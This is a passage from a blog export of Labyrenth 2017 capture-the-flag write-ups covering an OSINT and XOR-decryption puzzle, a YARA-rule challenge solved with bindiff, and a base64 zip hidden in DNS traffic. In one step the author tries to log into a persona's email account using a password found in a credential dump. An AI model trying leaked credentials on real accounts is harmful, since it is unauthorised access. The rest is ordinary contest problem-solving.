<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCZ-g2rJefQvtRSsRztjrjWMuzFUpPIfKfpVpOAJMqjCpqlzl0SqYDMul9Xg7iAIIZRKk2ihSXDo_wUDUYVz06qsVtI3UCXg9Xee4YkHvuuIm99W9IYeBnsC5rXhR_R-lK7zYbt7V-eukY/s1600/threat3-1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="699" data-original-width="1600" height="279" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCZ-g2rJefQvtRSsRztjrjWMuzFUpPIfKfpVpOAJMqjCpqlzl0SqYDMul9Xg7iAIIZRKk2ihSXDo_wUDUYVz06qsVtI3UCXg9Xee4YkHvuuIm99W9IYeBnsC5rXhR_R-lK7zYbt7V-eukY/s640/threat3-1.JPG" width="640" /></a></div>
and check the source for each page I would find<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEil9eKXs1G49jVpjkF9AijuVNv296vE0RdCZiUXBY2r1OENlnG_xDUe65a0FzHjgDZIwopKJ8FX2ePZP00qS7ag902MMaYIWOwBfh-8sNvj3RVQLHxRXElFhz6nM7Zcl3cJf0TleFPYvs9b/s1600/threat3-2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="311" data-original-width="1265" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEil9eKXs1G49jVpjkF9AijuVNv296vE0RdCZiUXBY2r1OENlnG_xDUe65a0FzHjgDZIwopKJ8FX2ePZP00qS7ag902MMaYIWOwBfh-8sNvj3RVQLHxRXElFhz6nM7Zcl3cJf0TleFPYvs9b/s1600/threat3-2.JPG" /></a></div>
the source for the main site is given above and contains a suspicious comment<br />
<br />
<blockquote class="tr_bq">
<span style="font-size: x-small;">642C740D0C297E3A5E1B4D6A70346C24175D56485F7F2B3C0E1F1C6D716F3C2013095B405B2C2F385D491C62763930231A560E13507879390B414E36216B327C1A065E42022C2032</span></blockquote>
<br />
Next steps I took were to try multiple decodings for that string and use all kinds of steg tools on the images which turned out to be a dead end. If you look at the given source you can see a copyright by s. williams.<br />
Next thing I did was a whois on youwontfind.me which returned<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhP59lOhha11uTpcxTmxTaxVSDpNPSh-VSmmbDPBktHK9xH5Wmfacx9M2ynDE_002Z3k8rnAZUKfx2DZ6edzseM2mR4fmigUEQI5SZdojCEMxeSqhs0Ndz44SKkqxFnvFlZIDUouF-rKRiY/s1600/threat3-3+-+Copy.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="473" data-original-width="790" height="382" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhP59lOhha11uTpcxTmxTaxVSDpNPSh-VSmmbDPBktHK9xH5Wmfacx9M2ynDE_002Z3k8rnAZUKfx2DZ6edzseM2mR4fmigUEQI5SZdojCEMxeSqhs0Ndz44SKkqxFnvFlZIDUouF-rKRiY/s640/threat3-3+-+Copy.JPG" width="640" /></a></div>
I googled the email address <i>Sarah.Williams.1986@yandex.com </i>and found a password dump, so I tried to login into the email account with the given password which obviously didn't work out (I realized it wouldn't make much sense as in everyone could just overtake the account).<br />
I tried other hits and found a linkedin profile that looked promising <a href="https://www.linkedin.com/in/sarahwilliams1986">https://www.linkedin.com/in/sarahwilliams1986</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpyRW9E5FqKqFWJk0Icp68HFCJkD0wXkvZf99CfgpoYcfmiitzQVjzJYgFS5ulowMkGfcKkX6HwExEP5J0nNIdap9C_GQJfdUKQVlDUjRTg0n_rpHl6x1difvS1j7lVZyyCVp64oCIwnYy/s1600/threat3-4.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="229" data-original-width="648" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpyRW9E5FqKqFWJk0Icp68HFCJkD0wXkvZf99CfgpoYcfmiitzQVjzJYgFS5ulowMkGfcKkX6HwExEP5J0nNIdap9C_GQJfdUKQVlDUjRTg0n_rpHl6x1difvS1j7lVZyyCVp64oCIwnYy/s1600/threat3-4.JPG" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDMfkH8hRBsjQ8A4MjOuxhYTdUPYeQO4RiF7eRrJP1PS-LotKfts3hszC9gil-TUjqQyeNcJBklHH9dfUtm0vNcWT-EbtRszz3fX6ctIc7MkNXyf3FNAXI9_5yKm0qL6vEpgCxeNy_FtOy/s1600/threat3-5.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="355" data-original-width="628" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDMfkH8hRBsjQ8A4MjOuxhYTdUPYeQO4RiF7eRrJP1PS-LotKfts3hszC9gil-TUjqQyeNcJBklHH9dfUtm0vNcWT-EbtRszz3fX6ctIc7MkNXyf3FNAXI9_5yKm0qL6vEpgCxeNy_FtOy/s640/threat3-5.JPG" width="640" /></a></div>
The profile contained many hints referring to PAN or labyrinth and also a link to a stackoverflow user<br />
<a href="https://stackoverflow.com/users/7794824/babytoby">https://stackoverflow.com/users/7794824/babytoby</a> which asked one specific question <a href="https://stackoverflow.com/questions/43807871/python-script-isnt-working/43807928">https://stackoverflow.com/questions/43807871/python-script-isnt-working/43807928</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAJTZZu2woF34DFOgfpPqGNPGwyhxSMAfUExn9U3MoPEO-qYN_d8pV6MOYUG9Iy6Pn3DnCWnOqcWVe2IvvDJQYt4dYDSVp_gyk7sHGA5EeKcwrC6L67w_Lny6iF0u7hocINQq5Jddp8dw_/s1600/threat3-6.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="744" data-original-width="741" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAJTZZu2woF34DFOgfpPqGNPGwyhxSMAfUExn9U3MoPEO-qYN_d8pV6MOYUG9Iy6Pn3DnCWnOqcWVe2IvvDJQYt4dYDSVp_gyk7sHGA5EeKcwrC6L67w_Lny6iF0u7hocINQq5Jddp8dw_/s1600/threat3-6.JPG" /></a></div>
Having a look at the given python code immediately raised some suspicions. The code contained weird and obvious errors. I cleaned the code and tried the given test parameters<br />
<br />
<blockquote class="tr_bq">
def encrypt(varAble1, varAble2):<br />
varAble1_size = len(varAble1)/float(len(varAble2))<br />
if str(varAble1_size).split(".")[1] == "0":<br />
pass<br />
else:<br />
while str(varAble1_size).split(".")[1] != "0":<br />
varAble1 += "@"<br />
varAble1_size = len(varAble1)/float(len(varAble2))<br />
code = []<br />
varAble1 = list(varAble1)<br />
varAble2 = list(varAble2)<br />
multiply_size = int(str((varAble1_size)).split(".")[0]) * 8<br />
while varAble1 != []:<br />
p_varAble1 = varAble1[0:8]<br />
p_varAble2 = varAble2[0:8]<br />
temp_list = []<br />
for i in xrange(0,8):<br />
if type(p_varAble2[i]) == type(int):<br />
new_ct = (ord(chr(p_varAble2[i])) ^ ord(p_varAble1[0]))<br />
else:<br />
try:<br />
new_ct = (ord(p_varAble2[i]) ^ ord(p_varAble1[0]))<br />
except:<br />
new_ct = ((p_varAble2[i]) ^ ord(p_varAble1[0]))<br />
code.append(new_ct)<br />
temp_list.append(new_ct)<br />
varAble1.pop(0)<br />
p_varAble1.pop(0)<br />
varAble2 = temp_list<br />
varAble2.reverse()<br />
code.reverse()<br />
#varAble1 = code.reverse()<br />
code_text = []<br />
for i in code:<br />
hex_value = hex(i)<br />
if len(hex_value) != 4:<br />
code_text.append("0" + hex(i)[2:])<br />
else:<br />
code_text.append(hex(i)[2:])<br />
code_text = "".join(code_text).upper()<br />
return code_text</blockquote>
I realized that the password parameter is only important for the first 8 bytes of the output, afterwards the result of the last xor calculation is used as the password for the next 8 byte chunk. To revert the operation one can simply xor the last two chunks of the encoded output with each other and repeat that process. To decode the last chunk the user supplied password is required. If n is the last chunk the decryption algorithm is to xor chunk[n] ^ chunk[n-1], chunk[n-1] ^ chuck[n-2] and concatenate the results. Running the following code with the comment from the website and without supplying a password<br />
<br />
<blockquote class="tr_bq">
def decryptor(encoded_text,password=''):<br />
chunks = [encoded_text[i:i+2] for i in range(0, len(encoded_text), 2)]<br />
x = len(chunks)<br />
res=[]<br />
p_1 = ''<br />
p_2 = ''<br />
while(x > 8):<br />
p_1 = chunks[x-8:x]<br />
p_2 = chunks[x-16:x-8][::-1]<br />
temp = ''<br />
for i in range(0,8):<br />
temp+=chr(int(p_1[i],16)^int(p_2[i],16))<br />
res.append(temp)<br />
x-=8<br />
if len(password) == 8:<br />
x = len(chunks)<br />
p_1 = chunks[x-8:x][::-1]<br />
temp = ''<br />
for i in range(0,8):<br />
temp+=chr(int(p_1[i],16)^ord(password[i]))<br />
res = [temp]+res<br />
print ''.join(res)</blockquote>
<br />
prints<br />
<br />
<blockquote class="tr_bq">
f45c4ba9286f2edf9f7e2d0def096b903541600624c299a731b8520bdedf}@@@</blockquote>
<br />
<br />
which looks promising. We know that the flag has to start with PAN{ so I calculated the first 4 chars of the password to be <i>baby. </i>I<i> </i>remembered the username of the stackoverflow account was babytoby, calling the function using the password <i>babytoby</i> gives us the flag<br />
<blockquote class="tr_bq">
<b>PAN{61dcf45c4ba9286f2edf9f7e2d0def096b903541600624c299a731b8520bdedf}</b></blockquote>
Mr. Joneshttp://www.blogger.com/profile/15346255825408058734noreply@blogger.com0tag:blogger.com,1999:blog-761861405376292116.post-87711474863905098112017-07-24T15:46:00.001+02:002017-07-24T16:55:42.891+02:00Palo Alto Labyrenth Threat 02 Writeup<h2>
Labyrenth 2017 Threat 02</h2>
While reading the description for the challenge I realized something odd, the description contained instructions that weren't actually needed but sounded familiar. Especially this sentence was odd<br />
<br />
<blockquote class="tr_bq">
The samples are included in yara_samples.7z password is "infected"</blockquote>
because there was no yara_samples.7z. I checked my folder from Labyrenth 2016 and had a match for the Threat 06 challenge from last year. (<a href="https://researchcenter.paloaltonetworks.com/2016/09/labyrenth-capture-the-flag-ctf-threat-track-solutions/">Labyrenth 2016 Track solution</a>)<br />
<br />
The challenge looks exactly the same with a different set of samples. The old solution suggests to bindiff two of the smallest files. So let's do that, at first I tried using the same approach as the 2016 solution recommended ordering by basic blocks. As I was lazy and wanted to use the given python script from last years solutions I checked what it required. Basically it wants a file containing the hex values for each file we want to compare starting with the same byte pattern. Let's say the pattern should start with 0xDE 0xAD 0xBE 0xEF the file would look like this<br />
<br />
<blockquote class="tr_bq">
DEADBEEF... bytes in file1<br />
DEADBEEF... bytes in file2<br />
...</blockquote>
If we chose the right pattern the file should contain an entry for all of our 56 files. So I bindiffed the two smallest files <i>ef763faec48e5e29d63c38088b2fc3cebb5086bb805e6f3b020649c7bbbf8614</i> and <i>de8d6ef64a8d9137834013f7263e9bdebb3be48f562af5679779376aaab0af5a</i> ordered the results by matching basic blocks.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2bsPRJNVS3jGOcqXpa6UxxQ2YrcyUGQ_OnOFsaB_kydLsNQ9xwAIidBcms2zeqsoEp4eHSJT2tdyWekqePCj-GAI6cUntj0HgFxV9Po7mayLWjTZ0YmwykVlkZz1yToGK2dqRKjFj_yRX/s1600/threat2-1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="664" data-original-width="1461" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2bsPRJNVS3jGOcqXpa6UxxQ2YrcyUGQ_OnOFsaB_kydLsNQ9xwAIidBcms2zeqsoEp4eHSJT2tdyWekqePCj-GAI6cUntj0HgFxV9Po7mayLWjTZ0YmwykVlkZz1yToGK2dqRKjFj_yRX/s1600/threat2-1.JPG" /></a></div>
<br />
<h4>
</h4>
<h4>
First try</h4>
I checked the first 5 sub_x entries (the directions stated that the rule should only match the given samples -> trying library functions doesn't make sense) by taking the first bytes of each and trying the following bash command<br />
<blockquote class="tr_bq">
for i in *; do xxd -p $i | tr -d '\n' | grep -o [bytepattern].* >> ~/hex_values.txt; done </blockquote>
followed by yara.py (which I copied from last years solution). Without success<br />
<br />
<h4>
Second try</h4>
<br />
My next approach was to order by matched instructions with the given hint in mind<br />
<blockquote class="tr_bq">
Hint: You drop me when you want to stop and lift me up when you want</blockquote>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHAB6yVU4x0ekYvK3MSMMP3OB7OEEhE5_SM-lxiNNJU_aONOcVQ058wL8gvMKaL4Y1ngGQinr_eFl24NuZ4xon5gwLzcnfOxHP1u44NsUlUyq2yfBH6I_iYxAEJOnU3jxG59wRJkFwW6JO/s1600/threat2-2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="417" data-original-width="1462" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHAB6yVU4x0ekYvK3MSMMP3OB7OEEhE5_SM-lxiNNJU_aONOcVQ058wL8gvMKaL4Y1ngGQinr_eFl24NuZ4xon5gwLzcnfOxHP1u44NsUlUyq2yfBH6I_iYxAEJOnU3jxG59wRJkFwW6JO/s1600/threat2-2.JPG" /></a></div>
<br />
when I opened sub_10001250_9 I had a good feeling about it because I saw some imports, which would make sense regarding the hint, so I gave it a try<br />
<br />
<blockquote class="tr_bq">
for i in *; do xxd -p $i | tr -d '\n' | grep -o 53568b35.* >> ~/hex_values.txt; done</blockquote>
I checked <i>wc ~/hex_values.txt </i>which returned 56 = the number of samples and ran the mentioned yara.py. The result was<br />
<br />
<blockquote class="tr_bq">
<span style="font-size: x-small;"> 53568b35???????05768???????0ffd668???????08bf8ffd668???????0ffd668???????0ffd68b35???????068???????0578bd8ffd668???????057a3???????0ffd668???????057a3???????0ffd668???????057a3???????0ffd668???????057a3???????0ffd668???????057a3???????0ffd668???????057a3???????0ffd668???????057a3???????0ffd668???????057a3???????0ffd668???????057a3???????0ffd668???????057a3???????0ffd668???????053a3???????0ffd668???????053a3???????0ffd668???????057a3???????0ffd668???????057a3???????0ffd668???????057a3???????0ffd668???????0a3???????057ffd668???????057a3???????0ffd668???????057a3???????0ffd65f5ea3???????05bc3</span></blockquote>
<br />
If you have a look at the sub_1001250 you can see that the pattern matches the entire function. So all that's left is to copy that rule in the given template and netcat the server<br />
<br />
<blockquote class="tr_bq">
cat rule.txt | netcat 52.42.81.161 8082</blockquote>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLt4H63e8VTy-LiEVb-dXZxwv20SnmF_z0WfLFTCqJSY_iDO1J4Tt0tHn_LLm_TGMKvF6H4hpvM7WamZsrrhp3zNcPYYY5spEll17q6JfgOZlYqkOrgij-0bOwGUF4vbpML65YzlD5_aHE/s1600/threat2-final.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="260" data-original-width="721" height="143" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLt4H63e8VTy-LiEVb-dXZxwv20SnmF_z0WfLFTCqJSY_iDO1J4Tt0tHn_LLm_TGMKvF6H4hpvM7WamZsrrhp3zNcPYYY5spEll17q6JfgOZlYqkOrgij-0bOwGUF4vbpML65YzlD5_aHE/s400/threat2-final.JPG" width="400" /></a></div>
<br />
<br />
Which gives us the flag <b> </b><br />
<blockquote class="tr_bq">
<b>PAN{AllByMyself}</b></blockquote>
Mr. Joneshttp://www.blogger.com/profile/15346255825408058734noreply@blogger.com0tag:blogger.com,1999:blog-761861405376292116.post-49070951987907902922017-07-24T10:22:00.000+02:002017-07-24T16:56:14.515+02:00Palo Alto Labyrenth Threat 01 Writeup<h2>
Labyrenth 2017 Threat 01</h2>
For the first challenge of the threat track we are given a file called challenge.pcap.<br />
<br />
Opening the pcap in WireShark reveals a bunch of DNS requests.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzeJV-AkI1UFnXbWwWS4nxDL8BD2SiDLAxLSQLce-ZhQe661HHy0LVDvh7igsxBpAEVPdusQBGUu_Jq5VhrEELWjzI1k81qz1ZiY6R8jGn_RFYpj5fzj1wmO7TForaBjNcB4M4BVIPEajv/s1600/threat1-1.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="216" data-original-width="1374" height="100" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzeJV-AkI1UFnXbWwWS4nxDL8BD2SiDLAxLSQLce-ZhQe661HHy0LVDvh7igsxBpAEVPdusQBGUu_Jq5VhrEELWjzI1k81qz1ZiY6R8jGn_RFYpj5fzj1wmO7TForaBjNcB4M4BVIPEajv/s640/threat1-1.JPG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">challenge.pcap</td></tr>
</tbody></table>
<br />
Looking at the raw requests one immediately notices a bunch of additional bytes<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><img border="0" data-original-height="83" data-original-width="483" height="67" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRIvW4qatBI8PQJEXAuHmCDxgxLtCH0JJAEANhWdHoXmGA3sPY8ZDlU8YLDIlp9EHLQsZpmzPFyC1dgzYvgU-aYVUz26-oOU3IEa7bRhQldNAOYYPRxjnN_qOAAqLlZQFNQHn6s7zcTu7q/s400/threat1-2.JPG" style="margin-left: auto; margin-right: auto;" width="400" /></td></tr>
<tr><td class="tr-caption" style="text-align: center;">unusual bytes in DNS request</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
</div>
Given the small file size I decided to manually open the pcap in Notepad++ and extracted the additional bytes.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd5yXdaz5t7dqu4hyphenhyphenjId7jpdv7fXBU_enXLo9MoXtL3PlYR-Xd2dBcPND9Fksq2deXUqkQ3i5Yp-7kWPHY84SBWDqXWIjDCWbfCMSPgHECfjZqoBjceX96Bh5FwRGzJv0pyhfvC7jeZ6oE/s1600/threat1-3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="501" data-original-width="479" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd5yXdaz5t7dqu4hyphenhyphenjId7jpdv7fXBU_enXLo9MoXtL3PlYR-Xd2dBcPND9Fksq2deXUqkQ3i5Yp-7kWPHY84SBWDqXWIjDCWbfCMSPgHECfjZqoBjceX96Bh5FwRGzJv0pyhfvC7jeZ6oE/s400/threat1-3.JPG" width="380" /></a></div>
<br />
<br />
This gives the following sequence<br />
<br />
<blockquote class="tr_bq">
<span style="font-size: x-small;">UEsDBBQAAAAIAOCIr0qMVwGeKQAAACoAAAAIABwAZmlsZS5kYXRVVAkAA3QYGlmBGBpZdXgLAAEE6AMAAAToAwAAC3D0q3bMyQnIz8wrSS0q9sxz8QsOzsgvzUkBCzklJmeXJxalFNdyAQBQSwECHgMUAAAACADgiK9KjFcBnikAAAAqAAAACAAYAAAAAAAB7AAAAtIEAAAAAZmlsZS5kYXRVVAUAA3QYGll1eAsAAQToAwAABOgDAABQSwUGAAAAAAEAAQBOAAAAawAAAAAA</span></blockquote>
With the given range of characters I guessed it to be a base64 encoded string, so I used some python code to base64 decode the string and write the result to a file. To avoid decoding errors I just skipped the last byte.<br />
<br />
<blockquote class="tr_bq">
import base64<br />
target = "UEsDBBQAAAAIAOCIr0qMVwGeKQAAACoAAAAIABwAZmlsZS5kYXRVVAkAA3QYGlmBGBpZdXgLAAEE6AMAAAToAwAAC3D0q3bMyQnIz8wrSS0q9sxz8QsOzsgvzUkBCzklJmeXJxalFNdyAQBQSwECHgMUAAAACADgiK9KjFcBnikAAAAqAAAACAAYAAAAAAAB7AAAAtIEAAAAAZmlsZS5kYXRVVAUAA3QYGll1eAsAAQToAwAABOgDAABQSwUGAAAAAAEAAQBOAAAAawAAAAAA"<br />
out_file = open('b64.bin','wb')<br />
out_file.write(base64.b64decode(target[:-1]))</blockquote>
<br />
Opening the output in HxD reveals the byte sequence "50 4B 03 04" which might indicate a zip file.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZGtPqUUiDEVBS7GcXNjQgpxP-hyBWXeOtE0EeXLsPOyFnPX0CRSZYkghzwXH5YcnXkMyw6KmmuNUFaZMqFiNFAA98rTybUR0lbC2A0p4WsIlNHl15c0VmBTAyzOqPeRQzLWrAHw4DimyU/s1600/threat1-4.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="262" data-original-width="624" height="167" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZGtPqUUiDEVBS7GcXNjQgpxP-hyBWXeOtE0EeXLsPOyFnPX0CRSZYkghzwXH5YcnXkMyw6KmmuNUFaZMqFiNFAA98rTybUR0lbC2A0p4WsIlNHl15c0VmBTAyzOqPeRQzLWrAHw4DimyU/s400/threat1-4.JPG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">b64 decoded file with zip file header</td></tr>
</tbody></table>
<br />
So I tried 7-zip "Extract Here" which gave me some warnings but also extracted a file called file.dat<br />
<br />
Opening that file in Notepad++ revealed the first flag:<br />
<blockquote class="tr_bq">
<b>PAN{AllPointersInDNSShouldPointBackwards}</b></blockquote>
Mr. Joneshttp://www.blogger.com/profile/15346255825408058734noreply@blogger.com0